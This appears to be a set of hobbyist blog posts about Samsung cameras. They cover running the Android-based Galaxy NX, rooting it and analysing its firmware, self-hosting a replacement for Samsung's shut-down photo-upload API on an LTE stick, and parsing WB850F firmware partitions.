In 2013, Samsung released the Galaxy NX (EK-GN100, EK-GN120, internal name "Galaxy U"), half Android smartphone, half interchangeable lens camera with a 20.3MP APS-C sensor, as part of the NX lineup that I analyzed last year.
A decade later, the Galaxy NX is an expensive rarity on the used market. Luckily, I was able to obtain one of these Android+Linux-SoC hybrids, and will find out what makes it tick in this post.
Hardware Overview
The Android part can probably be called a "phablet" by 2013's standards, given its 4.8" screen and lack of a speaker / microphone. It's powered by the 1.6GHz quad-core Exynos 4412 SoC, featuring LTE connectivity and dual-band WiFi. Back then, there was no VoLTE, so the lack of audio is understandable, and anyway it might look a bit weird to hold a rather large mirrorless camera with an even larger lens to your head.
Due to the large touchscreen, there is not much space for physical camera controls. Just the mode dial, shutter and video recording buttons. Most NX lenses have an additional i-Fn button to cycle through manual camera settings.
From the outside, it's not clear how the Android SoC and the DRIMeIV camera SoC interact with each other. They seem to live in an open relationship, anyway: from time to time, the camera SoC will crash, only showing a black live view, and the Android will eventually find that out and try to restart it (without much success):
Shutting down the camera, removing the battery and restarting everything will calm the evil ghosts... for a while.
Of the 2GB of physical RAM, Android can see 1.5GB, probably meaning that the remaining 512MB are assigned to the DRIMeIV SoC, matching the NX300. We'll do the flash and firmware analysis further below.
Android 4.2 is dead
The latest (and only) Android firmware released by Samsung is Android 4.2.2 Jelly Bean from 2012. There are no official or unofficial ports of later Android releases. The UI is snappy, but the decade of age shows, despite Samsung's customizations.
The dated Android is especially painful due to three issues: lack of apps, outdated encryption, and outdated root certificates:
Issue 1: No apps compatible with Android 4.2
Keeping an app backward-compatible is work. Much work. Especially with Google moving the goalposts every year. Therefore, most developers abandon old Android versions whenever adding a new feature in a backward-compatible fashion would be non-trivial.
Therefore, we need to scrape decade-old APK files from the shady corners of the Internet.
Free & Open Source apps
Google Play is of no help here, but luckily the F-Droid community cares about old devices. Less luckily, the old version of F-Droid will OOM-crash under the weight of the archive repository, so packages have to be hunted down and installed manually with adb after enabling developer settings. I had to look up the package name for each app I was interested in, then manually search for the latest compatible (MinVer: 4.x) build in the view-source of the respective archive browser page (a small script after the list below shows one way to automate that lookup):
- F-Droid: org.fdroid.fdroid, 1.12.1 (2021-04-16) APK (8MB)
- Firefox: org.mozilla.fennec_fdroid, 68.12.0 (2020-08-29) APK (53MB)
- Mastodon: org.joinmastodon.android, first version on F-Droid already requires Android 6. Bummer.
- Fedilab (Mastodon client): fr.gouv.etalab.mastodon, 2.2.0 (2019-06-03) APK (17MB)
- Tusky (Mastodon client): com.keylesspalace.tusky, 1.4.1 (2017-12-07) APK (3MB)
- yaxim: oh look, the newest release still works on 4.x! APK (3MB)
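For the record, this lookup can also be scripted. The following is a rough sketch (not from the original workflow) that assumes the F-Droid archive repository publishes an index-v1.json with a minSdkVersion field per APK, like the main repository does; the URL and field names are worth double-checking:

import json, urllib.request

# Android 4.2 corresponds to API level 17; assumption: the archive repo
# serves the same index-v1.json format as the main repo.
ARCHIVE = "https://f-droid.org/archive"
MAX_SDK = 17

def newest_compatible(package):
    with urllib.request.urlopen(f"{ARCHIVE}/index-v1.json") as r:
        index = json.load(r)
    versions = index.get("packages", {}).get(package, [])
    ok = [v for v in versions if v.get("minSdkVersion", 1) <= MAX_SDK]
    if not ok:
        return None
    best = max(ok, key=lambda v: v["versionCode"])
    return best["versionName"], f"{ARCHIVE}/{best['apkName']}"

print(newest_compatible("org.fdroid.fdroid"))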
In the end, the official Mastodon client wasn't available, and the other ones were so old and buggy (and/or suffered from issues 2 and 3 below) that I went back to using the Mastodon web interface from Firefox.
Proprietary Apps
As everywhere on the Internet, there is a large number of shady,
malware-pushing, SEO-optimized, easy to fall for websites that offer APK
files scraped from Google Play. Most of them will try to push their own
"installer" app to you, or even disguise their installer as the app you
try to get.
Again, knowing the internal package name helps to find the right page. Searching multiple portals might help you get the latest APK that still supports your device.
- apkmonk - scroll down to "All Versions", clicking on an individual version will start the APK download (no way to know the required Android release without trial and error).
- APKPure - don't click on "Use APKPure App", don't install the browser extension. Click on "Old versions of ..." or on "All Versions". Clicking an individual version in the table will show the required Android release.
- APKMirror - has a listing of old versions ("See more uploads..."), but only shows the actual Android release compatibility on the respective app version's page.
Issue 1b: limited RAW editing
TL;DR: Snapseed fails, but Lightroom works with some quirks on the Galaxy NX. Long version:
The Galaxy NX is a camera first, and a smartphone (phablet) second. It has very decent interchangeable lenses, a 20MP sensor, and can record RAW photos in Samsung's SRW format.
Snapseed: error messages galore
Given that it's also an Android device, the free Snapseed tool is the most obvious choice to process the RAW images. It supports the industry standard Adobe patented openly-documented "digital negative" DNG format.
To convert from RAW to DNG, there is a convenient tool named raw2dng that supports quite a bunch of formats, including SRW. The latest version running on Android 4.2 is raw2dng 2.4.2.
The app's UI is a bit cumbersome, but it will successfully convert SRW to DNG on the Galaxy NX! Unfortunately, it will not add them to the Android media index, so we also need to run SD Scanner after each conversion.
Yay! We have completed step 1 out of 3! Now, we only need to open the newly-converted DNG in Snapseed.
The latest Snapseed version still running on Android 4.2 is Snapseed 2.17.0.
That version won't register as a file handler for DNG files, and you can't choose them from the "Open..." dialog in Snapseed, but you can "Send to..." a DNG from your file manager:
Okay, so you can't. Well, but the "Open..." dialog shows each image twice, the JPG and the SRW, so we probably can open the latter and do our RAW editing anyway:
Bummer. Apparently, this feature relies on DNG support that was only added in Android 5. But the error message means that it was deliberately blocked, so let's downgrade Snapseed... The error was added in 2.3; versions 2.1 and 2.0 opened the SRW but treated it like a JPG (no raw development, probably an implicit conversion implemented by Samsung's firmware; you can also use raw images with other apps, and then they run out of memory and crash). Snapseed 2.0 finally doesn't have this error message... but instead another one:
So we can't process our raw photos with Snapseed on Android 4.2. What a pity.
Lightroom: one picture at a time
Luckily, there is a commercial alternative: Adobe Lightroom. The last version for our old Android is Lightroom 3.5.2.
As part of the overall enshittification, it will ask you all the time to log in / register with your Adobe account, and will refuse to edit SRW pictures (because they "were not created on the device"). However, it will actually accept (and process!) DNG files converted with raw2dng and indexed with SD Scanner, and will allow basic development including full-resolution JPEG exports.
However, you may only ever "import" a single DNG file at a time (it takes roughly 3-4 seconds). If you try to import multiple files, Lightroom will hang forever:
It will also remember the pending imports on next app start, and immediately hang up again. The only way out is from Android Settings ➡ Applications ➡ Lightroom ➡ Clear data; then import each image individually into Lightroom.
Issue 2: No TLS 1.3, deactivated TLS 1.2
In 2018, TLS 1.3 happened, and pushed many sites and their API endpoints to remove TLS 1.0 and 1.1.
However, Android's SSLSocket poses a problem here. Support for TLS 1.1 and 1.2 was introduced in Android 4.1, but only enabled by default in Android 5. Apps that didn't explicitly enable it on older devices are stuck on TLS 1.0, and are out of luck when accessing securely-configured modern API endpoints. Given that most apps abandoned Android 4.x compatibility before TLS 1.2 became omnipresent, the old APKs we can use won't work with today's Internet.
There is another aspect to TLS 1.2, and that's the introduction of elliptic-curve certificates (ECDSA ciphers). Sites that switch from RSA to ECDSA certificates will not work if TLS 1.2 isn't explicitly enabled in the app. Now, hypothetically, you can decompile the APK, patch in TLS 1.2 support, and reassemble a self-signed app, but that would be real work.
Note: TLS 1.3 was only added (and activated) in Android 10, so we are completely out of luck with any services requiring that.
Of course, the TLS compatibility is only an issue for apps that use Android's native network stack, which is 99.99% of all apps. Firefox is one of the few exceptions as it comes with its own SSL/TLS implementation and actually supports TLS 1.0 to 1.3 on Android 4!
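To check from a modern machine whether a given endpoint still completes a TLS 1.0 handshake (and would therefore still work for an unpatched Android 4.x app), a quick probe along these lines can help. This is just an illustration; note that a current OpenSSL may itself refuse TLS 1.0 unless its security level is lowered, so a failure can also be caused client-side:

import socket, ssl

def probe(host, version):
    # force exactly one protocol version and report whether the handshake succeeds
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE  # we only care about the handshake, not the cert
    ctx.minimum_version = version
    ctx.maximum_version = version
    try:
        with socket.create_connection((host, 443), timeout=5) as raw:
            with ctx.wrap_socket(raw, server_hostname=host) as tls:
                return tls.version()
    except (ssl.SSLError, OSError) as e:
        return f"failed ({e.__class__.__name__})"

for v in (ssl.TLSVersion.TLSv1, ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3):
    print(f"{v.name:8s} -> {probe('example.org', v)}")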
Issue 3: Let's Encrypt Root CA
Now even if the service you want to talk to still supports TLS 1.0 (or the respective app from back when Android 4.x was still en vogue activated TLS 1.2), there is another problem. Most websites are using the free Let's Encrypt certificates, especially for API endpoints. Luckily, Let's Encrypt identified and solved the Android compatibility problem in 2020!
All that a website operator (each website operator) needs to do is to ensure that they add the DST Root CA X3 signed ISRG Root X1 certificate in addition to the Let's Encrypt R3 certificate to their server's certificate chain! 🤯
Otherwise, their server will not be trusted by old Android:
Such a dialog will only be shown by apps which allow the user to override an "untrusted" Root CA (e.g. using the MemorizingTrustManager). Other apps will just abort with obscure error messages, saying that the server is not reachable and please-check-your-internet-connection.
Alternatively, it's possible to patch the respective app (real work!), or to add the LE Root CA to the user's certificate store. The last approach requires setting an Android-wide password or unlock pattern, because, you know, security!
The lock screen requirement can be worked around on a rooted device by adding the certificate to the /system partition, using apps like the Root Certificate Manager(ROOT) (it requires root permissions to install Root Certificates to the root filesystem!), or by following an easy 12-step adb-shell-bouncycastle-keytool tutorial.
Getting Root
There is a handful of Android 4.x rooting apps that use one of the many well-documented exploits to obtain temporary root permissions, or to install some old version of SuperSU. All of them fail due to the aforementioned TLS issues.
In the end, the only one that worked was the Galaxy NX (EK-GN120) Root from XDA-Dev, which needs to be installed through Samsung's ODIN, and will place a su binary and the SuperSU app on the root filesystem.
Now, ODIN is not only illegal to distribute, but also still causes PTSD flashbacks years after the last time I used it. Luckily, Heimdall is a FOSS replacement that is easy and robust, and all we need to do is to extract the tar file and run:
heimdall flash --BOOT boot.img
On the next start, su and SuperSU will be added to the /system partition.
Firmware structure
This is a slightly more detailed recap of the earlier Galaxy NX firmware analysis.
Android firmware
The EK-GN120 firmware is a Matryoshka doll of containers. It is provided as a ZIP that contains a .tar.md5 file (and a DLL?! Maybe for Odin?):
Archive: EK-GN120_DBT_1_20140606095330_hny2nlwefj.zip
Length Method Size Cmpr Date Time CRC-32 Name
-------- ------ ------- ---- ---------- ----- -------- ----
1756416082 Defl:N 1144688906 35% 2014-06-06 09:53 4efae9c7 GN120XXUAND3_GN120DBTANE1_GN120XXUAND3_HOME.tar.md5
1675776 Defl:N 797975 52% 2014-06-06 09:58 34b56b1d SS_DL.dll
-------- ------- --- -------
1758091858 1145486881 35% 2 files
The .tar.md5 is an actual tar archive with an appended MD5 checksum. They didn't even bother with a newline:
$ tail -1 GN120XXUAND3_GN120DBTANE1_GN120XXUAND3_HOME.tar.md5
[snip garbage]056c3570e489a8a5c84d6d59da3c5dee GN120XXUAND3_GN120DBTANE1_GN120XXUAND3_HOME.tar
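For reference, a small Python sketch to verify such a file; it assumes the trailer is exactly the md5sum-style output ("<32 hex digits>  <name>.tar") appended without a newline, as seen above:

import hashlib, os, re

def verify_tar_md5(path, chunk=1 << 20):
    # locate the md5sum-style trailer at the very end of the file
    size = os.path.getsize(path)
    with open(path, "rb") as f:
        f.seek(max(0, size - 256))
        tail = f.read()
    m = re.search(rb"([0-9a-f]{32}) +\S+\.tar\s*$", tail)
    if not m:
        raise ValueError("no md5 trailer found")
    expected = m.group(1).decode()
    payload_len = size - (len(tail) - m.start())
    # hash everything before the trailer, i.e. the actual tar archive
    md5 = hashlib.md5()
    with open(path, "rb") as f:
        remaining = payload_len
        while remaining:
            block = f.read(min(chunk, remaining))
            md5.update(block)
            remaining -= len(block)
    print("OK" if md5.hexdigest() == expected else "MISMATCH", md5.hexdigest())

verify_tar_md5("GN120XXUAND3_GN120DBTANE1_GN120XXUAND3_HOME.tar.md5")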
The tar itself contains a bunch more containers:
-rwxr-xr-x dpi/dpi 79211348 2014-04-16 13:46 camera.bin
-rw-r--r-- dpi/dpi 5507328 2014-04-16 13:49 boot.img
-rw-r--r-- dpi/dpi 6942976 2014-04-16 13:49 recovery.img
-rw-r--r-- dpi/dpi 1564016712 2014-04-16 13:48 system.img
-rwxr-xr-x dpi/dpi 52370176 2014-04-16 13:46 modem.bin
-rw-r--r-- dpi/dpi 40648912 2014-05-20 21:27 cache.img
-rw-r--r-- dpi/dpi 7704808 2014-05-20 21:27 hidden.img
These img and bin files contain different parts of the firmware and are flashed into respective partitions of the phone/camera:
- camera.bin: SLP container with five partitions for the DRIMeIV Tizen Linux SoC
- boot.img: (Android) Linux kernel and initramfs
- recovery.img: Android recovery kernel and initramfs
- system.img: Android (sparse) root filesystem image
- modem.bin: a 50 MByte FAT16 image... with Qualcomm modem files
- cache.img: Android cache partition image
- hidden.img: Android hidden partition image (contains a few watermark pictures and Over_the_horizon.mp3 in a folder INTERNAL_SDCARD)
DRIMeIV firmware
The camera.bin is 77MB and features the SLP\x00 header known from the Samsung NX300. It's also mentioning the internal model name as "GALAXYU":
camera.bin: GALAXYU firmware 0.01 (D20D0LAHB01) with 5 partitions
144 5523488 f68a86 ffffffff vImage
5523632 7356 ad4b0983 7fffffff D4_IPL.bin
5530988 63768 3d31ae89 65ffffff D4_PNLBL.bin
5594756 2051280 b8966d27 543fffff uImage
7646036 71565312 4c5a14bc 4321ffff platform.img
The platform.img file contains a UBIFS root partition; presumably vImage is used for upgrading the DRIMeIV firmware, and uImage is the standard kernel running on the camera SoC. The rootfs features "squeeze/sid" in /etc/debian_version, even though it's Tizen / Samsung Linux Platform.
There is a 500KB /usr/bin/di-galaxyu-app that's probably responsible for camera operation as well as for talking to the Android CPU (the NX300 di-camera-app that actually implements the camera UI is 3.1MB).
Camera API
To actually use the camera, it needs to be exposed to the Android UI, which talks to the Linux kernel on the Android SoC, which probably talks to the Linux kernel on the DRIMeIV SoC, which runs di-galaxyu-app. There is probably some communication mechanism like SPI or I2C for configuration and signalling, and also a shared memory area to transmit high-bandwidth data (images and video streams).
Here we only get a brief overview of the components involved; further source reading and reverse engineering need to be done to actually understand how the pieces fit together.
The Android side
On Android, the com.sec.android.app.camera app is responsible for camera handling. When it's started or switches to gallery mode, the screen briefly goes black, indicating that maybe the UI control is handed over to the DRIMeIV SoC?
The code for the camera app can be found in /system/app/SamsungCamera2_GalaxyNX.apk and /system/app/SamsungCamera2_GalaxyNX.odex, and it needs to be deodexed in order to decompile the Java code.
There is an Exynos 4412 Linux source drop that also contains a DRIMeIV video driver. That driver references a set of resolutions going up to 20MP, which matches the Galaxy NX sensor specs. It is exposing a Video4Linux camera, and seems to be using SPI or I2C (based on an #ifdef) to talk to the actual DRIMeIV processor.
The DRIMeIV side
On the other end, the Galaxy NX source code dump contains the Linux kernel running on the DRIMeIV SoC, with a drivers/i2c/si2c_drime4.c file that registers a "Samsung Drime IV Slave I2C Driver", which also allocates a memory region for MMIO.
The closed-source di-galaxyu-app is referencing both SPI and I2C, and needs to be reverse-engineered.
(*) Galaxy NX photo (C) Samsung marketing material
From 2009 to 2014, Samsung released dozens of camera models and even some camcorders with built-in WiFi and a feature to upload photos and videos to social media, using Samsung's Social Network Services (SNS). That service was discontinued in 2021, leaving the cameras disconnected.
We are bringing a reverse-engineered API implementation of the SNS to a $20 LTE modem stick in order to email or publish our photos to Mastodon on the go.
Social Network Services (SNS) API
The SNS API is a set of HTTP endpoints consuming and returning XML-like messages (the sent XML is malformed, and the received data is not syntax-checked by the strstr()-based parser). It is used by all Samsung WiFi cameras created between 2011 and 2014, and allows proxy-uploading photos and videos to a series of social media services (Facebook, Picasa, Flickr, YouTube, ...).
It is built on plain-text HTTP, and uses either OAuth or a broken, hand-rolled encryption scheme to "protect" the user's social media credentials.
As the original servers have been shut down, the only way to re-create the API is to reverse engineer the client code located in various cameras' firmware (NX300, WB850F, HMX-QF30) and old packet traces.
Luckily, the lack of HTTPS and the vulnerable encryption mean that we can easily redirect the camera's traffic to our re-implementation API. On the other hand, we do not want to force the user to send their credentials over the insecure channel, and therefore will store them in the API bridge instead.
The re-implementation is written in Python on top of Flask, and needs to work around a few protocol-violating bugs on the camera side.
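As one small illustration of the kind of workaround involved (hypothetical code, not taken from the project): since the cameras may send XML that a strict parser rejects, individual fields are safer to pull out with tolerant pattern matching, similar in spirit to the camera's own strstr() approach:

import re

def extract_tag(body: bytes, tag: str):
    # pull a single element out of possibly malformed camera XML,
    # optionally unwrapping a CDATA section
    name = re.escape(tag).encode()
    m = re.search(rb"<" + name + rb">(?:<!\[CDATA\[)?(.*?)(?:\]\]>)?</" + name + rb">",
                  body, re.DOTALL)
    return m.group(1).decode("utf-8", "replace") if m else None

body = b"<email><sender>Camera@samsungcamera.com</sender></email>"
print(extract_tag(body, "sender"))  # Camera@samsungcamera.com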
Deployment
The SNS bridge needs to be reachable by the camera, and we need to DNS-redirect the original Samsung API hostnames to it. It can be hosted on a free VPS, but then we still need to do the DNS trickery on the WiFi side.
When on the go, you also need to have a mobile-backed WiFi hotspot. Unfortunately, redirecting DNS for individual hostnames on stock Android is hard; you can merely change the DNS server to one under your control. But then you need to add a VPN tunnel or host a public DNS resolver, and those will become DDoS reflectors very fast.
The $20 LTE stick
Luckily, there is an exciting dongle that will give us all three features: a configurable WiFi hotspot, an LTE uplink, and enough power to run the samsung-nx-emailservice right on it:
Hackable $20 modem combines LTE and PI Zero W2 power.
It also has the bonus of limiting access to the insecure SNS API to the local WiFi hotspot network.
Initial Configuration
There is an excellent step-by-step guide to install Debian that I will not repeat here.
On some devices, the original ADB-enabling trick does not work, but you can directly open the unauthenticated http://192.168.100.1/usbdebug.html page in the browser, and within a minute the stick will reboot with ADB enabled.
If you have the hardware revision UZ801 v3.x of the stick, you need to use a custom kernel + base image.
Please follow the above instructions to complete the Debian installation.
You should be logged in as root@openstick now for the next steps.
The openstick will support adb shell, USB RNDIS and WiFi to access it, but for the cameras it needs to expose a WiFi hotspot. You can create a NetworkManager-based hotspot using nmcli or by other means as appropriate for you.
Installing samsung-nx-emailservice
We need git, Python 3 and its venv module to get started, install the source, and patch werkzeug to compensate for Samsung's broken client implementation:
apt install --no-install-recommends git python3-venv virtualenv
git clone https://github.com/ge0rg/samsung-nx-emailservice
cd samsung-nx-emailservice
python3 -m venv venv
source ./venv/bin/activate
pip3 install -r requirements.txt
# the patch is for python 3.8, we have python 3.9
cd venv/lib/python3.9/
patch -p4 < ../../../flask-3.diff
cd -
python3 samsungserver.py
By default, this will open an HTTP server on port :8080 on all IP addresses of the openstick. You can verify that by connecting to http://192.168.68.1:8080/ on the USB interface. You should see this page:
We need to change the port to 80, and ideally we should not expose the service to the LTE side of things, so we have to obtain the WiFi hotspot's IP address using ip addr show wlan0:
11: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 02:00:a1:61:c7:3a brd ff:ff:ff:ff:ff:ff
inet 192.168.79.1/24 brd 192.168.79.255 scope global noprefixroute wlan0
valid_lft forever preferred_lft forever
inet6 fe80::a1ff:fe61:c73a/64 scope link
valid_lft forever preferred_lft forever
Accordingly, we edit samsungserver.py and change the code at the end of the file to bind to 192.168.79.1 on port 80:
if __name__ == '__main__':
app.run(debug = True, host='192.168.79.1', port=80)
We need to change config.toml and enter our "whitelisted" sender addresses, as well as the email and Mastodon credentials there. To obtain a Mastodon access token from your instance, you need to register a new application.
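To illustrate what the bridge does with that token (a rough sketch with placeholder values, not the project's actual code), posting a photo boils down to two calls against the standard Mastodon REST API:

import requests

INSTANCE = "https://mastodon.example"   # placeholder
TOKEN = "your-access-token"             # from the "new application" page

def post_photo(jpeg_path, text):
    auth = {"Authorization": f"Bearer {TOKEN}"}
    # 1. upload the picture as a media attachment
    with open(jpeg_path, "rb") as f:
        media = requests.post(f"{INSTANCE}/api/v1/media",
                              headers=auth, files={"file": f}).json()
    # 2. create a status referencing the attachment
    status = requests.post(f"{INSTANCE}/api/v1/statuses", headers=auth,
                           data={"status": text, "media_ids[]": media["id"]})
    return status.json()["url"]

print(post_photo("SAM_1234.JPG", "sent from a Samsung camera"))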
Automatic startup with systemd
We also create a systemd service file called samsung-nx-email.service in /etc/systemd/system/ so that the service will be started automatically:
[Unit]
Description=Samsung NX API
After=syslog.target network.target
[Service]
Type=simple
WorkingDirectory=/root/samsung-nx-emailservice
ExecStart=/root/samsung-nx-emailservice/venv/bin/python3 /root/samsung-nx-emailservice/samsungserver.py
Restart=on-abort
StandardOutput=journal
[Install]
WantedBy=multi-user.target
After that, we load, start, and activate it for auto-start:
systemctl daemon-reload
systemctl enable samsung-nx-email.service
systemctl start samsung-nx-email.service
Using journalctl -fu samsung-nx-email we can verify that everything is working:
Jul 05 10:01:38 openstick systemd[1]: Started Samsung NX API.
Jul 05 10:01:38 openstick python3[2229382]: * Serving Flask app 'samsungserver'
Jul 05 10:01:38 openstick python3[2229382]: * Debug mode: on
Jul 05 10:01:38 openstick python3[2229382]: WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
Jul 05 10:01:38 openstick python3[2229382]: * Running on http://192.168.79.1:80
Jul 05 10:01:38 openstick python3[2229382]: Press CTRL+C to quit
Jul 05 10:01:38 openstick python3[2229382]: * Restarting with stat
Jul 05 10:01:39 openstick python3[2229388]: * Debugger is active!
Jul 05 10:01:39 openstick python3[2229388]: * Debugger PIN: 123-456-789
Security warning: this is not secure!
WARNING: This is a development server. [...]
Yes, this straight-forward deployment relying on python's built-in WSGI is not meant for production, which is why we limit it to our private WiFi.
Furthermore, the API implementation is not performing authentication beyond checking the address against the SENDERS variable. Given that transmissions are in plain text, enforcing passwords could backfire on the user.
Redirecting DNS
By default, the Samsung cameras will attempt to connect to a few servers via HTTP to find out if they are on a captive portal hotspot and to interact with the social media. The full list of hosts can be found in the project README.
As we are using NetworkManager for the hotspot, and it uses dnsmasq internally, we can use dnsmasq's config syntax and create an additional config file /etc/NetworkManager/dnsmasq-shared.d/00-samsung-nx.conf that will map all relevant addresses to the hotspot's IP address:
address=/snsgw.samsungmobile.com/192.168.79.1
address=/gld.samsungosp.com/192.168.79.1
address=/www.samsungimaging.com/192.168.79.1
address=/www.ospserver.net/192.168.79.1
address=/www.yahoo.co.kr/192.168.79.1
address=/www.msn.com/192.168.79.1
After a reboot, we should be up and running, and can connect from the camera to the WiFi hotspot to send our pictures.
Hotspot detection strikes again
The really old models (ST1000/CL65, SH100) will mis-detect a private IP for the Samsung service as a captive hotspot portal and give you this cryptic error message:
Certification is needed from the Access Point. Connection cannot be made at this time. Call ISP for further details
If you see this message, you need to trick the camera into using a non-private IP address, which by Samsung's standard is one that doesn't begin with 192.168. You can change the hotspot config in /etc/NetworkManager/system-connections to use a different RFC 1918 range from 10.0.0.0/8 or 172.16.0.0/12, or you can band-aid around the issue by dice-rolling a random IP from those ranges that you don't need to access (e.g. 10.23.42.99), returning it from 00-samsung-nx.conf, and using iptables to redirect HTTP traffic going to that address to the local SNS API instead:
iptables -t nat -A PREROUTING -p tcp -d 10.23.42.99 --dport 80 -j DNAT --to-destination 192.168.79.1:8080
This will prevent you from accessing 10.23.42.99 on your ISP's network via HTTP, which is probably not a huge loss.
You can persist that rule over reboots by storing it in /etc/iptables/rules.v4.
Demo
This is how the finished pipeline looks in practice (the whole sequence is 3 minutes, shortened and accelerated for brevity):
And here's the resulting post:
Samsung's WB850F compact camera was the first model to combine the DRIMeIII SoC with WiFi. Together with the EX2F, it features an uncompressed firmware binary where Samsung helpfully added a partialImage.o.map file with a full linker dump and all symbol names into the firmware ZIP. We are using this gift to reverse-engineer the main SoC firmware, so that we can make it pass the WiFi hotspot detection and use samsung-nx-emailservice.
This is a follow-up to the Samsung WiFi cameras article and part of the Samsung NX series.
WB850F_FW_210086.zip - the outer container
The WB850F is one of the few models where Samsung still publishes firmware and support files after discontinuing the iLauncher application.
The WB850F_FW_210086.zip archive we can get there contains quite a few files (as identified by file):
GPS_FW/BASEBAND_FW_Flash.mbin: data
GPS_FW/BASEBAND_FW_Ram.mbin: data
GPS_FW/Config.BIN: data
GPS_FW/flashBurner.mbin: data
FWUP: ASCII text, with CRLF line terminators
partialImage.o.map: ASCII text
WB850-FW-SR-210086.bin: data
wb850f_adj.txt: ASCII text, with CRLF line terminators
The FWUP file just contains the string upgrade all, which is a script for the firmware testing/automation module. The wb850f_adj.txt file is a similar but more complex script to upgrade the GPS firmware and delete the respective files. Let's skip the GPS-related script and GPS_FW folder for now.
partialImage.o.map - the linker dump
The partialImage.o.map is a text file with >300k lines, containing the linker output for partialImage.o, including a full memory map of the linked file:
output input virtual
section section address size file
.text 00000000 01301444
.text 00000000 000001a4 sysALib.o
$a 00000000 00000000
sysInit 00000000 00000000
L$_Good_Boot 00000090 00000000
archPwrDown 00000094 00000000
...
DevHTTPResponseStart 00321a84 000002a4
DevHTTPResponseData 00321d28 00000100
DevHTTPResponseEnd 00321e28 00000170
...
.data 00000000 004ed40c
.data 00000000 00000874 sysLib.o
sysBus 00000000 00000004
sysCpu 00000004 00000004
sysBootLine 00000008 00000004
This goes on and on and on, and it's a real treasure map! Now we just need to find the island that it belongs to.
WB850-FW-SR-210086.bin - header analysis
Looking into WB850-FW-SR-210086.bin with binwalk yields a long list of file headers (HTML, PNG, JPEG, ...), a VxWorks header, and quite a number of Unix paths, but nothing that looks like partitions or filesystems.
Let's hex-dump the first kilobyte instead:
00000000: 3231 3030 3836 0006 4657 5f55 502f 4f4e 210086..FW_UP/ON
00000010: 424c 312e 6269 6e00 0000 0000 0000 0000 BL1.bin.........
00000020: 0000 0000 0000 0000 c400 0000 0008 0000 ................
00000030: 4f4e 424c 3100 0000 0000 0000 0000 0000 ONBL1...........
00000040: 0000 0000 4657 5f55 502f 4f4e 424c 322e ....FW_UP/ONBL2.
00000050: 6269 6e00 0000 0000 0000 0000 0000 0000 bin.............
00000060: 0000 0000 30b6 0000 c408 0000 4f4e 424c ....0.......ONBL
00000070: 3200 0000 0000 0000 0000 0000 0000 0000 2...............
00000080: 5b57 4238 3530 5d44 5343 5f35 4b45 595f [WB850]DSC_5KEY_
00000090: 5742 3835 3000 0000 0000 0000 0000 0000 WB850...........
000000a0: 38f4 d101 f4be 0000 4d61 696e 5f49 6d61 8.......Main_Ima
000000b0: 6765 0000 0000 0000 0000 0000 526f 6d46 ge..........RomF
000000c0: 532f 5350 4944 2e52 6f6d 0000 0000 0000 S/SPID.Rom......
000000d0: 0000 0000 0000 0000 0000 0000 00ac f402 ................
000000e0: 2cb3 d201 5265 736f 7572 6365 0000 0000 ,...Resource....
000000f0: 0000 0000 0000 0000 4657 5f55 502f 5742 ........FW_UP/WB
00000100: 3835 302e 4845 5800 0000 0000 0000 0000 850.HEX.........
00000110: 0000 0000 0000 0000 864d 0000 2c5f c704 .........M..,_..
00000120: 4f49 5300 0000 0000 0000 0000 0000 0000 OIS.............
00000130: 0000 0000 4657 5f55 502f 736b 696e 2e62 ....FW_UP/skin.b
00000140: 696e 0000 0000 0000 0000 0000 0000 0000 in..............
00000150: 0000 0000 48d0 2f02 b2ac c704 534b 494e ....H./.....SKIN
00000160: 0000 0000 0000 0000 0000 0000 0000 0000 ................
*
000003f0: 0000 0000 0000 0000 0000 0000 5041 5254 ............PART
This looks very interesting. It starts with the firmware version, 210086, then 0x00 0x06, directly followed by FW_UP/ONBL1.bin at offset 0x008, which very much looks like a file name. The next file name, FW_UP/ONBL2.bin, comes at 0x044, so this is probably a 60-byte "partition" record:
00000008: 4657 5f55 502f 4f4e 424c 312e 6269 6e00 FW_UP/ONBL1.bin.
00000018: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000028: c400 0000 0008 0000 4f4e 424c 3100 0000 ........ONBL1...
00000038: 0000 0000 0000 0000 0000 0000 ............
After the file name, there is quite a bunch of zeroes (making up a 32-byte zero-padded string), followed by two little-endian integers 0xc4 and 0x800, followed by a 20-byte zero-padded string ONBL1, which is probably the respective partition name. After that, the next records of the same structure follow. The integers in the second record (ONBL2) are 0xb630 and 0x8c4, so we can assume the first number is the length, and the second one is the offset in the file (the offset of one record is always offset+length of the previous one).
In total, there are six records, so the 0x00 0x06 between the version string and the first record is probably a termination or padding byte for the firmware version and a one-byte number of partitions.
With this knowledge, we can reconstruct the partition table as follows:
File name | size | offset | partition name |
---|---|---|---|
FW_UP/ONBL1.bin | 196 (0xc4) | 0x0000800 | ONBL1 |
FW_UP/ONBL2.bin | 46 KB (0xb630) | 0x00008c4 | ONBL2 |
[WB850]DSC_5KEY_WB850 | 30 MB (0x1d1f438) | 0x000bef4 | Main_Image |
RomFS/SPID.Rom | 48 MB (0x2f4ac00) | 0x1d2b32c | Resource |
FW_UP/WB850.HEX | 19 KB (0x4d86) | 0x4c75f2c | OIS |
FW_UP/skin.bin | 36 MB (0x22fd048) | 0x4c7acb2 | SKIN |
Let's write a tool to extract DRIMeIII firmware partitions, and use it!
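The parsing logic boils down to a few lines; here is a minimal Python sketch based on the field layout deduced above (32-byte file name, two little-endian 32-bit integers for size and offset, 20-byte partition name) - not the actual extraction tool:

import struct

def parse_partition_table(fw_path):
    with open(fw_path, "rb") as f:
        header = f.read(0x400)
    version = header[:6].decode()        # "210086"
    count = header[7]                    # one-byte number of partitions
    parts = []
    for i in range(count):
        rec = header[8 + i * 60 : 8 + (i + 1) * 60]
        fname = rec[:32].rstrip(b"\x00").decode()
        size, offset = struct.unpack("<II", rec[32:40])
        pname = rec[40:60].rstrip(b"\x00").decode()
        parts.append((pname, fname, size, offset))
    return version, parts

version, parts = parse_partition_table("WB850-FW-SR-210086.bin")
for pname, fname, size, offset in parts:
    print(f"{pname:12s} {fname:24s} size=0x{size:x} offset=0x{offset:x}")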
WB850-FW-SR-210086.bin - code and data partitions
The tool is extracting partitions based on their partition names, appending ".bin" respectively. Running file on the output is not very helpful:
ONBL1.bin: data
ONBL2.bin: data
Main_Image.bin: OpenPGP Secret Key
